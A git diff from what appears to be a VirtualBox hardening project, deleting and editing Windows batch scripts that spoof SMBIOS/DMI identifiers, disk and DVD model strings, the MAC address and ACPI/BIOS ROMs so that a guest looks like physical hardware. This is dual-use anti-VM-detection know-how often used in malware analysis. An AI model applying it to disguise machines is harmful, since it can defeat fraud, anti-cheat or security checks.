diff --git a/Binary/Tsugumi.sys b/Binary/Tsugumi.sys
deleted file mode 100644
index 54a801e..0000000
Binary files a/Binary/Tsugumi.sys and /dev/null differ
diff --git a/Binary/data/5.2.x/ACPI-DSDT.bin b/Binary/data/5.2.x/ACPI-DSDT.bin
deleted file mode 100644
index 9337f9e..0000000
Binary files a/Binary/data/5.2.x/ACPI-DSDT.bin and /dev/null differ
diff --git a/Binary/data/5.2.x/ACPI-SSDT1.bin b/Binary/data/5.2.x/ACPI-SSDT1.bin
deleted file mode 100644
index 76f54cd..0000000
Binary files a/Binary/data/5.2.x/ACPI-SSDT1.bin and /dev/null differ
diff --git a/Binary/data/5.2.x/VBoxEFI64_5.2.12.fd b/Binary/data/5.2.x/VBoxEFI64_5.2.12.fd
deleted file mode 100644
index f4b5808..0000000
Binary files a/Binary/data/5.2.x/VBoxEFI64_5.2.12.fd and /dev/null differ
diff --git a/Binary/data/5.2.x/VBoxEFI64_5.2.18.fd b/Binary/data/5.2.x/VBoxEFI64_5.2.18.fd
deleted file mode 100644
index 5601684..0000000
Binary files a/Binary/data/5.2.x/VBoxEFI64_5.2.18.fd and /dev/null differ
diff --git a/Binary/data/5.2.x/VBoxEFI64_5.2.4.fd b/Binary/data/5.2.x/VBoxEFI64_5.2.4.fd
deleted file mode 100644
index 6a4c1c6..0000000
Binary files a/Binary/data/5.2.x/VBoxEFI64_5.2.4.fd and /dev/null differ
diff --git a/Binary/data/5.2.x/hidevm_ahci.cmd b/Binary/data/5.2.x/hidevm_ahci.cmd
deleted file mode 100644
index 3318208..0000000
--- a/Binary/data/5.2.x/hidevm_ahci.cmd
+++ /dev/null
@@ -1,73 +0,0 @@
-rem @echo off
-
-rem BIOS/AHCI mode
-
-rem vboxman is the full path to the vboxmanage executable
-rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc)
-
-set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe"
-set vmscfgdir=D:\Virtual\VBOX\Settings\
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "Asus"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "08/10/13"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMajor" "5"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMinor" "9"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMajor" "1"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMinor" "0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVendor" "Asus"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemProduct" "MyBook5,2"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVersion" "1.0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSerial" "CSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSKU" "FM550EA#ACB"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemFamily" "Ultrabook"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVendor" "Asus"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardProduct" "Mac-F22788AA"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVersion" "3.0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardSerial" "BSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardLocInChass" "Board Loc In"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardBoardType" 10
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVendor" "Asus Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisType" 10
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVersion" "Mac-F22788AA"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisSerial" "CSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisAssetTag" "WhiteHouse"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/ModelNumber" "Hitachi HTS543230AAA384"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/FirmwareRevision" "ES2OA60W"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/SerialNumber" "2E3024L1T2V9KA"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ModelNumber" "Slimtype DVD A DS8A8SH"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/FirmwareRevision" "KAA2"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/SerialNumber" "ABCDEF0123456789"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIVendorId" "Slimtype"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIProductId" "DVD A DS8A8SH"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIRevision" "KAA2"
-
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "ASUS"
-%vboxman% modifyvm "%1" --macaddress1 6CF0491A6E12
-%vboxman% modifyvm "%1" --paravirtprovider legacy
-%vboxman% modifyvm "%1" --bioslogoimagepath "%vmscfgdir%splash.bmp"
-%vboxman% modifyvm "%1" --hwvirtex on
-%vboxman% modifyvm "%1" --vtxvpid on
-%vboxman% modifyvm "%1" --vtxux on
-%vboxman% modifyvm "%1" --apic on
-%vboxman% modifyvm "%1" --pae on
-%vboxman% modifyvm "%1" --longmode on
-%vboxman% modifyvm "%1" --hpet on
-%vboxman% modifyvm "%1" --nestedpaging on
-%vboxman% modifyvm "%1" --largepages on
-
-cd /d %vmscfgdir%
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/LanBootRom" "%vmscfgdir%pxerom.bin"
-
-
-@pause
diff --git a/Binary/data/5.2.x/hidevm_efiahci.cmd b/Binary/data/5.2.x/hidevm_efiahci.cmd
deleted file mode 100644
index 0b6d443..0000000
--- a/Binary/data/5.2.x/hidevm_efiahci.cmd
+++ /dev/null
@@ -1,69 +0,0 @@
-rem @echo off
-
-rem EFI/AHCI mode
-
-rem vboxman is the full path to the vboxmanage executable
-rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc)
-
-set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe"
-set vmscfgdir=D:\Virtual\VBOX\Settings\
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVendor" "Apple Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseDate" "08/10/13"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMajor" "5"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMinor" "9"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMajor" "1"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMinor" "0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemVendor" "Apple Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "MacBook5,2"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemSerial" "CSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemSKU" "FM550EA#ACB"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemFamily" "Ultrabook"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardVendor" "Apple Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Mac-F22788AA"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardVersion" "3.0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardSerial" "BSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardLocInChass" "Board Loc In"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardBoardType" 10
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisVendor" "Apple Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisType" 10
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisVersion" "Mac-F22788AA"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisSerial" "CSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisAssetTag" "Apple"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A"
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/ModelNumber" "Hitachi HTS543240A7A384"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/FirmwareRevision" "ES2OA60W"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/SerialNumber" "2E3024L1T2V9KA"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ModelNumber" "Slimtype DVD A DS8A8SH"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/FirmwareRevision" "KAA2"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/SerialNumber" "ABCDEF0123456789"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIVendorId" "Slimtype"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIProductId" "DVD A DS8A8SH"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIRevision" "KAA2"
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "APPLE"
-%vboxman% modifyvm "%1" --macaddress1 6CF0491A6E85
-%vboxman% modifyvm "%1" --paravirtprovider legacy
-%vboxman% modifyvm "%1" --hwvirtex on
-%vboxman% modifyvm "%1" --vtxvpid on
-%vboxman% modifyvm "%1" --vtxux on
-%vboxman% modifyvm "%1" --apic on
-%vboxman% modifyvm "%1" --pae on
-%vboxman% modifyvm "%1" --longmode on
-%vboxman% modifyvm "%1" --hpet on
-%vboxman% modifyvm "%1" --nestedpaging on
-%vboxman% modifyvm "%1" --largepages on
-
-cd /d %vmscfgdir%
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin"
-
-@pause
diff --git a/Binary/data/5.2.x/hidevm_efiide.cmd b/Binary/data/5.2.x/hidevm_efiide.cmd
deleted file mode 100644
index 78ef4d8..0000000
--- a/Binary/data/5.2.x/hidevm_efiide.cmd
+++ /dev/null
@@ -1,68 +0,0 @@
-rem @echo off
-
-rem EFI/IDE mode
-
-rem vboxman is the full path to the vboxmanage executable
-rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc)
-
-set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe"
-set vmscfgdir=D:\Virtual\VBOX\Settings\
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVendor" "Apple Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseDate" "08/10/13"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMajor" "5"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMinor" "9"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMajor" "1"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMinor" "0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemVendor" "Apple Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "MacBook5,2"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemSerial" "CSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemSKU" "FM550EA#ACB"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemFamily" "Ultrabook"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardVendor" "Apple Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Mac-F22788AA"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardVersion" "3.0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardSerial" "BSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardLocInChass" "Board Loc In"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiBoardBoardType" 10
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisVendor" "Apple Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisType" 10
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisVersion" "Mac-F22788AA"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisSerial" "CSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiChassisAssetTag" "Apple"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/ModelNumber" "Hitachi HTS543232A7A484"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/FirmwareRevision" "ES2OA60W"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/SerialNumber" "2E3024L1T2V9KA"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ModelNumber" "Slimtype DVD A DS8A8SH"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/FirmwareRevision" "KAA2"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/SerialNumber" "ABCDEF0123456789"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIVendorId" "Slimtype"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIProductId" "DVD A DS8A8SH"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIRevision" "KAA2"
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "APPLE"
-%vboxman% modifyvm "%1" --macaddress1 6CF0491A6E85
-%vboxman% modifyvm "%1" --paravirtprovider legacy
-%vboxman% modifyvm "%1" --hwvirtex on
-%vboxman% modifyvm "%1" --vtxvpid on
-%vboxman% modifyvm "%1" --vtxux on
-%vboxman% modifyvm "%1" --apic on
-%vboxman% modifyvm "%1" --pae on
-%vboxman% modifyvm "%1" --longmode on
-%vboxman% modifyvm "%1" --hpet on
-%vboxman% modifyvm "%1" --nestedpaging on
-%vboxman% modifyvm "%1" --largepages on
-
-cd /d %vmscfgdir%
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin"
-
-@pause
diff --git a/Binary/data/5.2.x/hidevm_ide.cmd b/Binary/data/5.2.x/hidevm_ide.cmd
deleted file mode 100644
index 1682427..0000000
--- a/Binary/data/5.2.x/hidevm_ide.cmd
+++ /dev/null
@@ -1,70 +0,0 @@
-rem @echo off
-
-rem BIOS/IDE mode
-
-rem vboxman is the full path to the vboxmanage executable
-rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc)
-
-set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe"
-set vmscfgdir=D:\Virtual\VBOX\Settings\
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "Asus"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "08/10/13"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMajor" "5"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMinor" "9"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMajor" "1"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMinor" "0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVendor" "Asus"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemProduct" "MyBook5,2"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVersion" "1.0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSerial" "CSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSKU" "FM550EA#ACB"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemFamily" "Ultrabook"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVendor" "Asus"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardProduct" "Mac-F22788AA"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVersion" "3.0"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardSerial" "BSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardLocInChass" "Board Loc In"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardBoardType" 10
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVendor" "Asus Inc."
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisType" 10
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVersion" "Mac-F22788AA"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisSerial" "CSN12345678901234567"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisAssetTag" "WhiteHouse"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/ModelNumber" "Hitachi HTS543232A8A384"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/FirmwareRevision" "ES2OA60W"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/SerialNumber" "2E3024L1T2V9KA"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ModelNumber" "Slimtype DVD A DS8A8SH"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/FirmwareRevision" "KAA2"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/SerialNumber" "ABCDEF0123456789"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIVendorId" "Slimtype"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIProductId" "DVD A DS8A8SH"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIRevision" "KAA2"
-
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "ASUS"
-%vboxman% modifyvm "%1" --macaddress1 6CF0491A6E02
-%vboxman% modifyvm "%1" --paravirtprovider legacy
-%vboxman% modifyvm "%1" --bioslogoimagepath "%vmscfgdir%splash.bmp"
-%vboxman% modifyvm "%1" --hwvirtex on
-%vboxman% modifyvm "%1" --vtxvpid on
-%vboxman% modifyvm "%1" --vtxux on
-%vboxman% modifyvm "%1" --apic on
-%vboxman% modifyvm "%1" --pae on
-%vboxman% modifyvm "%1" --longmode on
-%vboxman% modifyvm "%1" --hpet on
-%vboxman% modifyvm "%1" --nestedpaging on
-%vboxman% modifyvm "%1" --largepages on
-
-cd /d %vmscfgdir%
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios.bin"
-%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/LanBootRom" "%vmscfgdir%pxerom.bin"
-
-@pause
diff --git a/Binary/data/5.2.x/pcbios.bin b/Binary/data/5.2.x/pcbios.bin
deleted file mode 100644
index c5965f1..0000000
Binary files a/Binary/data/5.2.x/pcbios.bin and /dev/null differ
diff --git a/Binary/data/5.2.x/pxerom.bin b/Binary/data/5.2.x/pxerom.bin
deleted file mode 100644
index 15cb3d5..0000000
Binary files a/Binary/data/5.2.x/pxerom.bin and /dev/null differ
diff --git a/Binary/data/5.2.x/splash.bmp b/Binary/data/5.2.x/splash.bmp
deleted file mode 100644
index d2fad1a..0000000
Binary files a/Binary/data/5.2.x/splash.bmp and /dev/null differ
diff --git a/Binary/data/5.2.x/videorom.bin b/Binary/data/5.2.x/videorom.bin
deleted file mode 100644
index a026f34..0000000
Binary files a/Binary/data/5.2.x/videorom.bin and /dev/null differ
diff --git a/Binary/data/ACPI-DSDT.bin b/Binary/data/ACPI-DSDT.bin
index 591bbd6..954d095 100644
Binary files a/Binary/data/ACPI-DSDT.bin and b/Binary/data/ACPI-DSDT.bin differ
diff --git a/Binary/data/ACPI-SSDT1.bin b/Binary/data/ACPI-SSDT.bin
similarity index 86%
rename from Binary/data/ACPI-SSDT1.bin
rename to Binary/data/ACPI-SSDT.bin
index f7bf4ec..89d5fcf 100644
Binary files a/Binary/data/ACPI-SSDT1.bin and b/Binary/data/ACPI-SSDT.bin differ
diff --git a/Binary/data/VBoxEFI64-6.0.0.fd b/Binary/data/VBoxEFI64-6.0.0.fd
deleted file mode 100644
index e33a2cc..0000000
Binary files a/Binary/data/VBoxEFI64-6.0.0.fd and /dev/null differ
diff --git a/Binary/data/VBoxEFI64-6.0.10.fd b/Binary/data/VBoxEFI64-6.0.10.fd
deleted file mode 100644
index e2fd352..0000000
Binary files a/Binary/data/VBoxEFI64-6.0.10.fd and /dev/null differ
diff --git a/Binary/data/VBoxEFI64-6.0.2.fd b/Binary/data/VBoxEFI64-6.0.2.fd
deleted file mode 100644
index d693e1b..0000000
Binary files a/Binary/data/VBoxEFI64-6.0.2.fd and /dev/null differ
diff --git a/Binary/data/VBoxEFI64-6.0.4.fd b/Binary/data/VBoxEFI64-6.0.4.fd
deleted file mode 100644
index 6a149e4..0000000
Binary files a/Binary/data/VBoxEFI64-6.0.4.fd and /dev/null differ
diff --git a/Binary/data/efi_amd64_fixed_6.1.2.fd b/Binary/data/efi_amd64_fixed_6.1.2.fd
new file mode 100644
index 0000000..9409ded
Binary files /dev/null and b/Binary/data/efi_amd64_fixed_6.1.2.fd differ
diff --git a/Binary/data/hidevm_ahci.cmd b/Binary/data/hidevm_ahci.cmd
index 3318208..1159861 100644
--- a/Binary/data/hidevm_ahci.cmd
+++ b/Binary/data/hidevm_ahci.cmd
@@ -1,6 +1,7 @@
rem @echo off
rem BIOS/AHCI mode
+rem This script is for use with VBoxHardenedLoader v2+
rem vboxman is the full path to the vboxmanage executable
rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc)
@@ -8,6 +9,8 @@ rem vmscfgdir is the path to directory that keeps vbox custom configuration data
set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe"
set vmscfgdir=D:\Virtual\VBOX\Settings\
+%vboxman% setextradata "%1" "VBoxInternal/CPUM/EnableHVP" 0
+
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "Asus"
